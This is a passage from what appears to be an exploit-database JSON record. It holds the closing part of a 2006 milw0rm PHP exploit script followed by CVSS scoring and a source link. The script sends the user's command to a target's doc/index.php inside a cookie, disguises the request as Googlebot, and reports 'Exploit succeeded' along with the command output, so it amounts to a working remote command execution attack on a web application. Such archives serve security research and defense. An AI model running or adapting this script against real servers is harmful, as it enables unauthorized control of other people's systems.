$i<=$argc-1; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\n{\n$cmd.=\" \".$argv[$i];\n}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\n$cmd=urlencode($cmd);\nif ($proxy<>'') {$p=\"http://\".$host.\":\".$port.$path;} else {$p=$path;}\n\n$packet =\"GET \".$p.\"doc/index.php HTTP/1.0\\r\\n\";\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Cookie: s=\".$loc.\"%2fsuntzu; cmd=\".$cmd.\";\\r\\n\"; //through cookies, log this :)\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n#debug\n#echo quick_dump($packet);\nsendpacketii($packet);\nif (strstr($html,\"*delim*\"))\n{$temp=explode(\"*delim*\",$html);\n echo \"Exploit succeeded...\\r\\n\\r\\n\";\n echo $temp[1];\n}\nelse\n{\n#debug\necho $html.\"\\r\\n\";\necho \"Exploit failed...\";\n}\n?>\n\n# milw0rm.com [2006-04-11]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1663/"}]}